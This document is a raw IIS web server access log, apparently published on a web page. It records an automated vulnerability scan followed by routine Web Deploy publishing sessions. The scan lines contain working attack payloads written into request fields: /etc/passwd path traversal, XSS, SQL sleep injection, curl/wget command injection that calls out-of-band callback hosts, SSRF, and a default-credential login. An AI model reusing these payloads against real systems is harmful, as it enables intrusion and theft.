2024-01-05 06:58:04 103.153.214.94 GET /dataservice/etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 12
2024-01-05 06:58:14 103.153.214.94 GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 31
2024-01-05 06:58:43 103.153.214.94 POST /cgi-bin/system_mgr.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 7
2024-01-05 06:58:46 103.153.214.94 POST /cgi-bin/system_mgr.cgi C1=ON&amp;cmd=cgi_ntp_time&amp;f_ntp_server=`curl 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 8
2024-01-05 06:59:26 103.153.214.94 GET /api/config - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 7
2024-01-05 07:01:14 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 7
2024-01-05 07:02:09 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 17
2024-01-05 07:02:11 103.153.214.94 POST /assets/_core/php/profile.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 11
2024-01-05 07:02:13 103.153.214.94 POST /assets/php/profile.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 10
2024-01-05 07:02:17 103.153.214.94 POST /vendor/qcubed/qcubed/assets/php/profile.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 07:02:24 103.153.214.94 GET /index.php fc=module&amp;module=productcomments&amp;controller=CommentGrade&amp;id_products%5B%5D=(select*from(select(sleep(6)))a) 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 8
2024-01-05 07:02:37 103.153.214.94 POST /api/graphql - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 6
2024-01-05 07:02:51 103.153.214.94 GET /wp-json/wp/v2/lesson/1 - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 9
2024-01-05 07:03:27 103.153.214.94 POST /login.htm - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10
2024-01-05 07:03:52 103.153.214.94 PUT /v1/kv/2aVH1GVRV17pzUS8uNVXy0HihKu - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 10
2024-01-05 07:03:55 103.153.214.94 GET /v1/kv/2aVH1GVRV17pzUS8uNVXy0HihKu raw 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 6
2024-01-05 07:04:56 103.153.214.94 GET /Items/RemoteSearch/Image ProviderName=TheMovieDB&amp;ImageURL=http://notburpcollaborator.net 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 10
2024-01-05 07:05:27 103.153.214.94 GET /index.php page&amp;action=edit&amp;f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&amp;restore=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 07:05:55 103.153.214.94 GET /manage/fileDownloader sec=1 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 9
2024-01-05 07:05:56 103.153.214.94 GET /pme/media/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7
2024-01-05 07:06:18 103.153.214.94 GET /index.php download=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 07:07:17 103.153.214.94 GET /help/english/index.html javascript:alert(document.domain) 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 11
2024-01-05 07:07:26 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 6
2024-01-05 07:08:08 103.153.214.94 GET /setup.cgi todo=debug&amp;x=currentsetting.htm 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 7
2024-01-05 07:09:51 103.153.214.94 GET /webmail/ language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 32
2024-01-05 07:11:01 103.153.214.94 GET /api/settings/values - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 8
2024-01-05 07:13:44 103.153.214.94 POST /api/v1/method.callAnon/sendForgotPasswordEmail - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 12
2024-01-05 07:16:56 103.153.214.94 GET /pacs/login.php message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 41
2024-01-05 07:17:28 103.153.214.94 GET /index.php page=/etc/passwd%00 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 9
2024-01-05 07:17:47 103.153.214.94 GET /dashboard/view-chair-list.php table_id=&#039;+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7
2024-01-05 07:18:05 103.153.214.94 GET /addons/ q=%3Csvg%2Fonload%3Dalert(1)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 11
2024-01-05 07:18:34 103.153.214.94 GET /tos/index.php user/login 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 9
2024-01-05 07:18:38 103.153.214.94 POST /wizard/initialise.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/tos/index.php?user/login 404 7 0 7
2024-01-05 07:19:16 103.153.214.94 GET /include/makecvs.php Event=%60curl+http%3a//cmbglsthtacjkv124nvg1jym5expyx5yd.oast.pro+-H+&#039;User-Agent%3a+fYV7nG&#039;%60 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 26
2024-01-05 07:19:19 103.153.214.94 GET /tos/index.php explorer/pathList&amp;path=%60curl+http%3a//cmbglsthtacjkv124nvga69bdhird8h8b.oast.pro+-H+&#039;User-Agent%3a+fYV7nG&#039;%60 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 5
2024-01-05 07:20:24 103.153.214.94 POST /assets/php/upload.php - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 http://bcvt.kontum.gov.vn:8172 404 7 0 68
2024-01-05 07:20:25 103.153.214.94 GET /+CSCOE+/session_password.html - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 11 0 8
2024-01-05 07:20:28 103.153.214.94 GET /assets/data/usrimg/2avh1frsnyjzflitsy3hyf6cvcb.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 5
2024-01-05 07:21:55 103.153.214.94 GET /server/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 07:22:07 103.153.214.94 GET /q start=2000/10/21-00:00:00&amp;end=2020/10/25-15:56:44&amp;m=sum:sys.cpu.nice&amp;o&amp;ylabel&amp;xrange=10:10&amp;yrange=[33:system(%27wget%20http://cmbglsthtacjkv124nvgnw5xka8d9mcfr.oast.pro%27)]&amp;wxh=1516x644&amp;style=linespoint&amp;baba=lala&amp;grid=t&amp;json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 6
2024-01-05 07:22:45 103.153.214.94 GET /wp-content/plugins/contact-form-7/readme.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11
2024-01-05 07:23:02 103.153.214.94 GET /searchblox/servlet/FileServlet col=9&amp;url=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8
2024-01-05 07:24:55 103.153.214.94 GET /advanced_component_system/index.php ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 9
2024-01-05 07:24:55 103.153.214.94 GET /s/2aVH1NUxqoLRe2OfIOdjqM8biec/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 9
2024-01-05 07:24:59 103.153.214.94 GET /s/2aVH1NUxqoLRe2OfIOdjqM8biec/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8
2024-01-05 07:25:46 103.153.214.94 GET / username=zyfwp&amp;password=PrOw!aN_fXp 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7
2024-01-05 07:25:49 103.153.214.94 GET /ext-js/index.html - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 9
2024-01-05 07:25:51 103.153.214.94 POST /goform/setSysAdm - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login.shtml 404 7 0 6
2024-01-05 07:26:17 103.153.214.94 POST /incom/modules/uploader/showcase/script.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 9
2024-01-05 07:26:20 103.153.214.94 GET /upload/userfiles/image/2aVH1I3K6PrGaxiZlwen1gn0god.png - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 9
2024-01-05 07:27:00 103.153.214.94 POST /actions/authenticate.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 9
2024-01-05 07:27:10 103.153.214.94 GET /wp-content/plugins/easy-wp-smtp/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 10
2024-01-05 07:27:13 103.153.214.94 GET /wp-content/plugins/wp-mail-smtp-pro/ - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 9
2024-01-05 07:27:25 103.153.214.94 GET /+CSCOT+/translation-table type=mst&amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;default-language&amp;lang=../ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 11 0 14
2024-01-05 07:27:27 103.153.214.94 GET /+CSCOT+/oem-customization app=AnyConnect&amp;type=oem&amp;platform=..&amp;resource-type=..&amp;name=%2bCSCOE%2b/portal_inc.lua 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 11 0 5
2024-01-05 07:28:39 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/detail.php subdomain=cmbglsthtacjkv124nvg7iznfspyxssqp.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 23
2024-01-05 07:28:41 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/get.php subdomain=cmbglsthtacjkv124nvgweehmtezme3jd.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 6
2024-01-05 07:28:45 103.153.214.94 GET /wp-content/plugins/canto/includes/lib/tree.php subdomain=cmbglsthtacjkv124nvgn9s9rq9amooxd.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 13
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-01-05 08:59:09
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-05 08:59:09 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 - 116.96.77.140 - - 401 2 5 28
2024-01-05 08:59:09 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 39
2024-01-05 08:59:09 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 42
2024-01-05 08:59:09 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 362
2024-01-05 08:59:09 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=be468d0f-6cdc-4752-8875-37fa7e23fe77;op=Sync - 200 0 0 241
2024-01-05 08:59:09 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 25
2024-01-05 08:59:09 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=be468d0f-6cdc-4752-8875-37fa7e23fe77;op=Sync - 200 0 0 271
2024-01-05 08:59:09 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 375
2024-01-05 08:59:15 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 26
2024-01-05 08:59:15 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 26
2024-01-05 08:59:17 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=407fd805-8218-45eb-ae6f-fb24f26ee1a7;op=Sync - 200 0 0 1457
2024-01-05 08:59:17 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 1560
2024-01-05 08:59:17 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 35
2024-01-05 08:59:19 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 1761
2024-01-05 08:59:19 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=407fd805-8218-45eb-ae6f-fb24f26ee1a7;op=Sync - 200 0 0 1609
2024-01-05 09:13:34 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 86
2024-01-05 09:13:34 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 29
2024-01-05 09:13:34 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=eb766242-a015-4507-bd50-c0df2f0c412c;op=Sync - 200 0 0 218
2024-01-05 09:13:34 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 345
2024-01-05 09:13:34 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 27
2024-01-05 09:13:35 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 411
2024-01-05 09:13:35 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=eb766242-a015-4507-bd50-c0df2f0c412c;op=Sync - 200 0 0 289
2024-01-05 09:13:48 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 30
2024-01-05 09:13:48 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 28
2024-01-05 09:13:49 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=b451768b-8c04-4eb3-9c81-053d7e8e5f77;op=Sync - 200 0 0 1524
2024-01-05 09:13:49 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 1640
2024-01-05 09:13:50 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 39
2024-01-05 09:13:51 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 1692
2024-01-05 09:13:51 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=b451768b-8c04-4eb3-9c81-053d7e8e5f77;op=Sync - 200 0 0 1522
2024-01-05 09:25:41 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 18
2024-01-05 09:25:41 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 39
2024-01-05 09:25:41 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 21
2024-01-05 09:25:42 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=75511599-e6dc-43ea-9173-5e5965848a97;op=Sync - 200 0 0 396
2024-01-05 09:25:42 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 469
2024-01-05 09:25:42 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10
2024-01-05 09:26:26 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=75511599-e6dc-43ea-9173-5e5965848a97;op=Sync - 200 0 0 44299
2024-01-05 09:26:26 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 44327
2024-01-05 09:35:41 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 41
2024-01-05 09:35:41 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 31
2024-01-05 09:35:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 451
2024-01-05 09:35:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=9fe02ab2-5bd4-4939-92fd-adf801671d47;op=Sync - 200 0 0 217
2024-01-05 09:35:41 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 26
2024-01-05 09:35:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=9fe02ab2-5bd4-4939-92fd-adf801671d47;op=Sync - 200 0 0 244
2024-01-05 09:35:41 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 351
2024-01-05 09:35:47 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 37
2024-01-05 09:35:48 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 28
2024-01-05 09:35:49 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=2fd831b8-2c71-4887-a4a2-6929fd82dabf;op=Sync - 200 0 0 1311
2024-01-05 09:35:49 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 1448
2024-01-05 09:35:49 103.153.214.94 HEAD /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 26
2024-01-05 09:35:51 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 VS17.0:PublishDialog:WTE17.4.326.54890;sid=2fd831b8-2c71-4887-a4a2-6929fd82dabf;op=Sync - 200 0 0 1961
2024-01-05 09:35:51 103.153.214.94 POST /msdeploy.axd site=qfoody-api 8172 qfoody 116.96.77.140 - - 200 0 0 2087
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-01-05 14:33:46
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-01-05 14:33:46 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 14
2024-01-05 14:33:46 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 23
2024-01-05 14:33:46 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 19
2024-01-05 14:33:46 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=518f9d05-5e83-48d8-8ef8-a1fbc4be2949;op=Sync - 200 0 0 448
2024-01-05 14:33:46 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 531
2024-01-05 14:33:46 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 10
2024-01-05 14:34:30 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=518f9d05-5e83-48d8-8ef8-a1fbc4be2949;op=Sync - 200 0 0 42966
2024-01-05 14:34:30 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 42999
</pre><center><hr width="920" color="black"/> <center>

</BODY>

</HTML>